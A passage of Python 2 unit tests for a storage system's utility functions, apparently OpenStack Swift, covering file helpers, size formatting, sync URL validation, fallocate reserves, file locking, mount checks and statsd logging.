'object-server/1.conf.d/base.conf',
'object-server/1.conf.d/1.conf',
'object-server/2.conf.d/base.conf',
'object-server/2.conf.d/2.conf',
'object-server/3.conf.d/base.conf',
'object-server/3.conf.d/3.conf',
'object-server/4.conf.d/base.conf',
'object-server/4.conf.d/4.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'object-server', '.conf',
dir_ext='conf.d')
self.assertEquals(len(conf_dirs), 4)
for i in range(4):
conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1))
self.assert_(conf_dir in conf_dirs)
def test_write_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'test')
utils.write_file(file_name, 'test')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEquals(contents, 'test')
# and also subdirs
file_name = os.path.join(t, 'subdir/test2')
utils.write_file(file_name, 'test2')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEquals(contents, 'test2')
# but can't over-write files
file_name = os.path.join(t, 'subdir/test2/test3')
self.assertRaises(IOError, utils.write_file, file_name,
'test3')
def test_remove_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'blah.pid')
# assert no raise
self.assertEquals(os.path.exists(file_name), False)
self.assertEquals(utils.remove_file(file_name), None)
with open(file_name, 'w') as f:
f.write('1')
self.assert_(os.path.exists(file_name))
self.assertEquals(utils.remove_file(file_name), None)
self.assertFalse(os.path.exists(file_name))
def test_human_readable(self):
self.assertEquals(utils.human_readable(0), '0')
self.assertEquals(utils.human_readable(1), '1')
self.assertEquals(utils.human_readable(10), '10')
self.assertEquals(utils.human_readable(100), '100')
self.assertEquals(utils.human_readable(999), '999')
self.assertEquals(utils.human_readable(1024), '1Ki')
self.assertEquals(utils.human_readable(1535), '1Ki')
self.assertEquals(utils.human_readable(1536), '2Ki')
self.assertEquals(utils.human_readable(1047552), '1023Ki')
self.assertEquals(utils.human_readable(1048063), '1023Ki')
self.assertEquals(utils.human_readable(1048064), '1Mi')
self.assertEquals(utils.human_readable(1048576), '1Mi')
self.assertEquals(utils.human_readable(1073741824), '1Gi')
self.assertEquals(utils.human_readable(1099511627776), '1Ti')
self.assertEquals(utils.human_readable(1125899906842624), '1Pi')
self.assertEquals(utils.human_readable(1152921504606846976), '1Ei')
self.assertEquals(utils.human_readable(1180591620717411303424), '1Zi')
self.assertEquals(utils.human_readable(1208925819614629174706176),
'1Yi')
self.assertEquals(utils.human_readable(1237940039285380274899124224),
'1024Yi')
def test_validate_sync_to(self):
for goodurl in ('http://1.1.1.1/v1/a/c/o',
'http://1.1.1.1:8080/a/c/o',
'http://2.2.2.2/a/c/o',
'https://1.1.1.1/v1/a/c/o',
''):
self.assertEquals(utils.validate_sync_to(goodurl,
['1.1.1.1', '2.2.2.2']),
None)
for badurl in ('http://1.1.1.1',
'httpq://1.1.1.1/v1/a/c/o',
'http://1.1.1.1/v1/a/c/o?query',
'http://1.1.1.1/v1/a/c/o#frag',
'http://1.1.1.1/v1/a/c/o?query#frag',
'http://1.1.1.1/v1/a/c/o?query=param',
'http://1.1.1.1/v1/a/c/o?query=param#frag',
'http://1.1.1.2/v1/a/c/o'):
self.assertNotEquals(
utils.validate_sync_to(badurl, ['1.1.1.1', '2.2.2.2']),
None)
def test_TRUE_VALUES(self):
for v in utils.TRUE_VALUES:
self.assertEquals(v, v.lower())
def test_config_true_value(self):
orig_trues = utils.TRUE_VALUES
try:
utils.TRUE_VALUES = 'hello world'.split()
for val in 'hello world HELLO WORLD'.split():
self.assertTrue(utils.config_true_value(val) is True)
self.assertTrue(utils.config_true_value(True) is True)
self.assertTrue(utils.config_true_value('foo') is False)
self.assertTrue(utils.config_true_value(False) is False)
finally:
utils.TRUE_VALUES = orig_trues
def test_config_auto_int_value(self):
expectations = {
# (value, default) : expected,
('1', 0): 1,
(1, 0): 1,
('asdf', 0): ValueError,
('auto', 1): 1,
('AutO', 1): 1,
('Aut0', 1): ValueError,
(None, 1): 1,
}
for (value, default), expected in expectations.items():
try:
rv = utils.config_auto_int_value(value, default)
except Exception, e:
if e.__class__ is not expected:
raise
else:
self.assertEquals(expected, rv)
def test_streq_const_time(self):
self.assertTrue(utils.streq_const_time('abc123', 'abc123'))
self.assertFalse(utils.streq_const_time('a', 'aaaaa'))
self.assertFalse(utils.streq_const_time('ABC123', 'abc123'))
def test_quorum_size(self):
expected_sizes = {1: 1,
2: 2,
3: 2,
4: 3,
5: 3}
got_sizes = dict([(n, utils.quorum_size(n)) for n in expected_sizes])
self.assertEqual(expected_sizes, got_sizes)
def test_rsync_ip_ipv4_localhost(self):
self.assertEqual(utils.rsync_ip('127.0.0.1'), '127.0.0.1')
def test_rsync_ip_ipv6_random_ip(self):
self.assertEqual(
utils.rsync_ip('fe80:0000:0000:0000:0202:b3ff:fe1e:8329'),
'[fe80:0000:0000:0000:0202:b3ff:fe1e:8329]')
def test_rsync_ip_ipv6_ipv4_compatible(self):
self.assertEqual(
utils.rsync_ip('::ffff:192.0.2.128'), '[::ffff:192.0.2.128]')
def test_fallocate_reserve(self):
class StatVFS(object):
f_frsize = 1024
f_bavail = 1
def fstatvfs(fd):
return StatVFS()
orig_FALLOCATE_RESERVE = utils.FALLOCATE_RESERVE
orig_fstatvfs = utils.os.fstatvfs
try:
fallocate = utils.FallocateWrapper(noop=True)
utils.os.fstatvfs = fstatvfs
# Want 1023 reserved, have 1024 * 1 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1023 reserved, have 512 * 2 free, so succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError, err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 1024 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError, err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 2048 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError, err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 2048 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError, err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 1023 reserved, have 1024 * 1 free, but file size is 1, so
# fails
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(1))
except OSError, err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1023 <= 1023')
# Want 1022 reserved, have 1024 * 1 free, and file size is 1, so
# succeeds
utils.FALLOCATE_RESERVE = 1022
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(1)), 0)
# Want 1023 reserved, have 1024 * 1 free, and file size is 0, so
# succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, and even though
# file size is 0, since we're under the reserve, fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError, err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
finally:
utils.FALLOCATE_RESERVE = orig_FALLOCATE_RESERVE
utils.os.fstatvfs = orig_fstatvfs
def test_fallocate_func(self):
class FallocateWrapper(object):
def __init__(self):
self.last_call = None
def __call__(self, *args):
self.last_call = list(args)
self.last_call[-1] = self.last_call[-1].value
return 0
orig__sys_fallocate = utils._sys_fallocate
try:
utils._sys_fallocate = FallocateWrapper()
# Ensure fallocate calls _sys_fallocate even with 0 bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 0)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate even with negative bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, -5678)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate properly with positive
# bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 1)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 1])
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 10 * 1024 * 1024 * 1024)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 10 * 1024 * 1024 * 1024])
finally:
utils._sys_fallocate = orig__sys_fallocate
def test_generate_trans_id(self):
fake_time = 1366428370.5163341
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('')
self.assertEquals(len(trans_id), 34)
self.assertEquals(trans_id[:2], 'tx')
self.assertEquals(trans_id[23], '-')
self.assertEquals(int(trans_id[24:], 16), int(fake_time))
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('-suffix')
self.assertEquals(len(trans_id), 41)
self.assertEquals(trans_id[:2], 'tx')
self.assertEquals(trans_id[34:], '-suffix')
self.assertEquals(trans_id[23], '-')
self.assertEquals(int(trans_id[24:34], 16), int(fake_time))
def test_get_trans_id_time(self):
ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e')
self.assertEquals(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06')
self.assertEquals(ts, 1366428678)
self.assertEquals(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time(
'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix')
self.assertEquals(ts, 1366428678)
self.assertEquals(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time('')
self.assertEquals(ts, None)
ts = utils.get_trans_id_time('garbage')
self.assertEquals(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright')
self.assertEquals(ts, None)
def test_tpool_reraise(self):
with patch.object(utils.tpool, 'execute', lambda f: f()):
self.assertTrue(
utils.tpool_reraise(MagicMock(return_value='test1')), 'test1')
self.assertRaises(Exception,
utils.tpool_reraise, MagicMock(side_effect=Exception('test2')))
self.assertRaises(BaseException,
utils.tpool_reraise,
MagicMock(side_effect=BaseException('test3')))
def test_lock_file(self):
flags = os.O_CREAT | os.O_RDWR
with NamedTemporaryFile(delete=False) as nt:
nt.write("test string")
nt.flush()
nt.close()
with utils.lock_file(nt.name, unlink=False) as f:
self.assertEqual(f.read(), "test string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, unlink=False, append=True) as f:
self.assertEqual(f.read(), "test string")
f.seek(0)
f.write("\nanother string")
f.flush()
f.seek(0)
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, timeout=3, unlink=False) as f:
try:
with utils.lock_file(nt.name, timeout=1, unlink=False) as f:
self.assertTrue(False, "Expected LockTimeout exception")
except LockTimeout:
pass
with utils.lock_file(nt.name, unlink=True) as f:
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
self.assertRaises(OSError, os.remove, nt.name)
def test_ismount_path_does_not_exist(self):
tmpdir = mkdtemp()
try:
assert utils.ismount(os.path.join(tmpdir, 'bar')) is False
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_not_mount(self):
tmpdir = mkdtemp()
try:
assert utils.ismount(tmpdir) is False
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
try:
utils.ismount(tmpdir)
except OSError:
pass
else:
self.fail("Expected OSError")
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_symlink(self):
tmpdir = mkdtemp()
try:
link = os.path.join(tmpdir, "tmp")
os.symlink("/tmp", link)
assert utils.ismount(link) is False
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_root(self):
assert utils.ismount('/') is True
def test_ismount_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
try:
utils.ismount(tmpdir)
except OSError:
pass
else:
self.fail("Expected OSError")
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_dev(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
parent = _os_lstat(path)
return MockStat(parent.st_mode, parent.st_dev + 1,
parent.st_ino)
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
try:
utils.ismount(tmpdir)
except OSError:
self.fail("Unexpected exception")
else:
pass
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_ino(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
return _os_lstat(path)
else:
parent_path = os.path.join(path, "..")
child = _os_lstat(path)
parent = _os_lstat(parent_path)
return MockStat(child.st_mode, parent.st_ino,
child.st_dev)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
try:
utils.ismount(tmpdir)
except OSError:
self.fail("Unexpected exception")
else:
pass
finally:
shutil.rmtree(tmpdir)
def test_parse_content_type(self):
self.assertEquals(utils.parse_content_type('text/plain'),
('text/plain', []))
self.assertEquals(utils.parse_content_type('text/plain;charset=utf-8'),
('text/plain', [('charset', 'utf-8')]))
self.assertEquals(
utils.parse_content_type('text/plain;hello="world";charset=utf-8'),
('text/plain', [('hello', '"world"'), ('charset', 'utf-8')]))
self.assertEquals(
utils.parse_content_type('text/plain; hello="world"; a=b'),
('text/plain', [('hello', '"world"'), ('a', 'b')]))
self.assertEquals(
utils.parse_content_type(r'text/plain; x="\""; a=b'),
('text/plain', [('x', r'"\""'), ('a', 'b')]))
self.assertEquals(
utils.parse_content_type(r'text/plain; x; a=b'),
('text/plain', [('x', ''), ('a', 'b')]))
self.assertEquals(
utils.parse_content_type(r'text/plain; x="\""; a'),
('text/plain', [('x', r'"\""'), ('a', '')]))
class TestFileLikeIter(unittest.TestCase):
def test_iter_file_iter(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
for chunk in utils.FileLikeIter(in_iter):
chunks.append(chunk)
self.assertEquals(chunks, in_iter)
def test_next(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
try:
chunk = iter_file.next()
except StopIteration:
break
chunks.append(chunk)
self.assertEquals(chunks, in_iter)
def test_read(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
iter_file = utils.FileLikeIter(in_iter)
self.assertEquals(iter_file.read(), ''.join(in_iter))
def test_read_with_size(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
chunk = iter_file.read(2)
if not chunk:
break
self.assertTrue(len(chunk) <= 2)
chunks.append(chunk)
self.assertEquals(''.join(chunks), ''.join(in_iter))
def test_read_with_size_zero(self):
# makes little sense, but file supports it, so...
self.assertEquals(utils.FileLikeIter('abc').read(0), '')
def test_readline(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline()
if not line:
break
lines.append(line)
self.assertEquals(
lines,
[v if v == 'trailing.' else v + '\n'
for v in ''.join(in_iter).split('\n')])
def test_readline2(self):
self.assertEquals(
utils.FileLikeIter(['abc', 'def\n']).readline(4),
'abcd')
def test_readline3(self):
self.assertEquals(
utils.FileLikeIter(['a' * 1111, 'bc\ndef']).readline(),
('a' * 1111) + 'bc\n')
def test_readline_with_size(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline(2)
if not line:
break
lines.append(line)
self.assertEquals(
lines,
['ab', 'c\n', 'd\n', 'ef', 'g\n', 'h\n', 'ij', '\n', '\n', 'k\n',
'tr', 'ai', 'li', 'ng', '.'])
def test_readlines(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = utils.FileLikeIter(in_iter).readlines()
self.assertEquals(
lines,
[v if v == 'trailing.' else v + '\n'
for v in ''.join(in_iter).split('\n')])
def test_readlines_with_size(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
iter_file = utils.FileLikeIter(in_iter)
lists_of_lines = []
while True:
lines = iter_file.readlines(2)
if not lines:
break
lists_of_lines.append(lines)
self.assertEquals(
lists_of_lines,
[['ab'], ['c\n'], ['d\n'], ['ef'], ['g\n'], ['h\n'], ['ij'],
['\n', '\n'], ['k\n'], ['tr'], ['ai'], ['li'], ['ng'], ['.']])
def test_close(self):
iter_file = utils.FileLikeIter('abcdef')
self.assertEquals(iter_file.next(), 'a')
iter_file.close()
self.assertTrue(iter_file.closed, True)
self.assertRaises(ValueError, iter_file.next)
self.assertRaises(ValueError, iter_file.read)
self.assertRaises(ValueError, iter_file.readline)
self.assertRaises(ValueError, iter_file.readlines)
# Just make sure repeated close calls don't raise an Exception
iter_file.close()
self.assertTrue(iter_file.closed, True)
class TestStatsdLogging(unittest.TestCase):
def test_get_logger_statsd_client_not_specified(self):
logger = utils.get_logger({}, 'some-name', log_route='some-route')
# white-box construction validation
self.assertEqual(None, logger.logger.statsd_client)
def test_get_logger_statsd_client_defaults(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'},
'some-name', log_route='some-route')
# white-box construction validation
self.assert_(isinstance(logger.logger.statsd_client,
utils.StatsdClient))
self.assertEqual(logger.logger.statsd_client._host, 'some.host.com')
self.assertEqual(logger.logger.statsd_client._port, 8125)
self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.')
self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1)
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, '')
def test_get_logger_statsd_client_non_defaults(self):
logger = utils.get_logger({
'log_statsd_host': 'another.host.com',
'log_statsd_port': '9876',
'log_statsd_default_sample_rate': '0.75',
'log_statsd_sample_rate_factor': '0.81',
'log_statsd_metric_prefix': 'tomato.sauce',
}, 'some-name', log_route='some-route')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.')
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
self.assertEqual(logger.logger.statsd_client._port, 9876)
self.assertEqual(logger.logger.statsd_client._default_sample_rate,
0.75)
self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
0.81)
def test_sample_rates(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: 0.50001
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: 0.49999
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith("|@0.5"))
def test_sample_rates_with_sample_rate_factor(self):
logger = utils.get_logger({
'log_statsd_host': 'some.host.com',
'log_statsd_default_sample_rate': '0.82',
'log_statsd_sample_rate_factor': '0.91',
})
effective_sample_rate = 0.82 * 0.91
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: effective_sample_rate + 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
payload)
effective_sample_rate = 0.587 * 0.91
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles', sample_rate=0.587)
self.assertEqual(len(mock_socket.sent), 2)
payload = mock_socket.sent[1][0]
self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
payload)
def test_timing_stats(self):
class MockController(object):
def __init__(self, status):
self.status = status
self.logger = self
self.args = ()
self.called = 'UNKNOWN'
def timing_since(self, *args):
self.called = 'timing'
self.args = args
@utils.timing_stats()
def METHOD(controller):
return Response(status=controller.status)
mock_controller = MockController(200)
METHOD(mock_controller)
self.assertEquals(mock_controller.called, 'timing')
self.assertEquals(len(mock_controller.args), 2)
self.assertEquals(mock_controller.args[0], 'METHOD.timing')
self.assert_(mock_controller.args[1] > 0)
mock_controller = MockController(404)
METHOD(mock_controller)
self.assertEquals(len(mock_controller.args), 2)
self.assertEquals(mock_controller.called, 'timing')
self.assertEquals(mock_controller.args[0], 'METHOD.timing')
self.assert_(mock_controller.args[1] > 0)
mock_controller = MockController(401)
METHOD(mock_controller)
self.assertEquals(len(mock_controller.args), 2)
self.assertEquals(mock_controller.called, 'timing')
self.assertEquals(mock_controller.args[0], 'METHOD.errors.timing')
self.assert_(mock_controller.args[1] > 0)
class UnsafeXrange(object):
"""
Like xrange(limit), but with extra context switching to screw things up.
"""
def __init__(self, upper_bound):
self.current = 0
self.concurrent_calls = 0
self.upper_bound = upper_bound
def __iter__(self):
return self
def next(self):
if self.concurrent_calls > 0:
raise ValueError("concurrent access is bad, mmmkay? (%r)")
self.concurrent_calls += 1
try:
if self.current >= self.upper_bound:
raise StopIteration
else:
val = self.current
self.current += 1
eventlet.sleep() # yield control
return val
finally:
self.concurrent_calls -= 1
class TestAffinityKeyFunction(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_single_region(self):
keyfn = utils.affinity_key_function("r3=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids)
def test_bogus_value(self):
self.assertRaises(ValueError,
utils.affinity_key_function, "r3")
self.assertRaises(ValueError,
utils.affinity_key_function, "r3=elephant")
def test_empty_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function("")
self.assert_(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_all_whitespace_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function(" \n")
self.assert_(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_with_zone_zero(self):
keyfn = utils.affinity_key_function("r4z0=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids)
def test_multiple(self):
keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids)
def test_more_specific_after_less_specific(self):
keyfn = utils.affinity_key_function("r2=100, r2z2=50")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids)
class TestAffinityLocalityPredicate(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_empty(self):
pred = utils.affinity_locality_predicate('')
self.assert_(pred is None)
def test_region(self):
pred = utils.affinity_locality_predicate('r1')
self.assert_(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1], ids)
def test_zone(self):
pred = utils.affinity_locality_predicate('r1z1')
self.assert_(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0], ids)
def test_multiple(self):
pred = utils.affinity_locality_predicate('r1, r3, r4z0')
self.assert_(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1, 4, 5, 6], ids)
def test_invalid(self):
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'falafel')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r8zQ')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r2d2')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r1z1=1')
class TestGreenthreadSafeIterator(unittest.TestCase):
def increment(self, iterable):
plus_ones = []
for n in iterable:
plus_ones.append(n + 1)
return plus_ones
def test_setup_works(self):
# it should work without concurrent access
self.assertEquals([0, 1, 2, 3], list(UnsafeXrange(4)))
iterable = UnsafeXrange(10)
pile = eventlet.GreenPile(2)
for _ in xrange(2):
pile.spawn(self.increment, iterable)
try:
sorted([resp for resp in pile])
self.assertTrue(False, "test setup is insufficiently crazy")
except ValueError:
pass
def test_access_is_serialized(self):
pile = eventlet.GreenPile(2)
iterable = utils.GreenthreadSafeIterator(UnsafeXrange(10))
for _ in xrange(2):
pile.spawn(self.increment, iterable)
response = sorted(sum([resp for resp in pile], []))
self.assertEquals(range(1, 11), response)
class TestStatsdLoggingDelegation(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('localhost', 0))
self.port = self.sock.getsockname()[1]
self.queue = Queue()
self.reader_thread = threading.Thread(target=self.statsd_reader)
self.reader_thread.setDaemon(1)
self.reader_thread.start()
def tearDown(self):
# The "no-op when disabled" test doesn't set up a real logger, so
# create one here so we can tell the reader thread to stop.
if not getattr(self, 'logger', None):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.logger.increment('STOP')
self.reader_thread.join(timeout=4)
self.sock.close()
del self.logger
def statsd_reader(self):
while True:
try:
payload = self.sock.recv(4096)
if payload and 'STOP' in payload:
return 42
self.queue.put(payload)
except Exception, e:
sys.stderr.write('statsd_reader thread: %r' % (e,))
break
def _send_and_get(self, sender_fn, *args, **kwargs):
"""
Because the client library may not actually send a packet with
sample_rate < 1, we keep trying until we get one through.
"""
got = None
while not got:
sender_fn(*args, **kwargs)
try:
got = self.queue.get(timeout=0.5)
except Empty:
pass
return got
def assertStat(self, expected, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assertEqual(expected, got)
def assertStatMatches(self, expected_regexp, sender_fn, *args, **kwargs):
got = self._send_and_get(sender_fn, *args, **kwargs)
return self.assert_(re.search(expected_regexp, got),
[got, expected_regexp])
def test_methods_are_no_ops_when_not_enabled(self):
logger = utils.get_logger({
# No "log_statsd_host" means "disabled"
'log_statsd_port': str(self.port),
}, 'some-name')
# Delegate methods are no-ops
self.assertEqual(None, logger.update_stats('foo', 88))
self.assertEqual(None, logger.update_stats('foo', 88, 0.57))
self.assertEqual(None, logger.update_stats('foo', 88,
sample_rate=0.61))
self.assertEqual(None, logger.increment('foo'))
self.assertEqual(None, logger.increment('foo', 0.57))
self.assertEqual(None, logger.increment('foo', sample_rate=0.61))
self.assertEqual(None, logger.decrement('foo'))
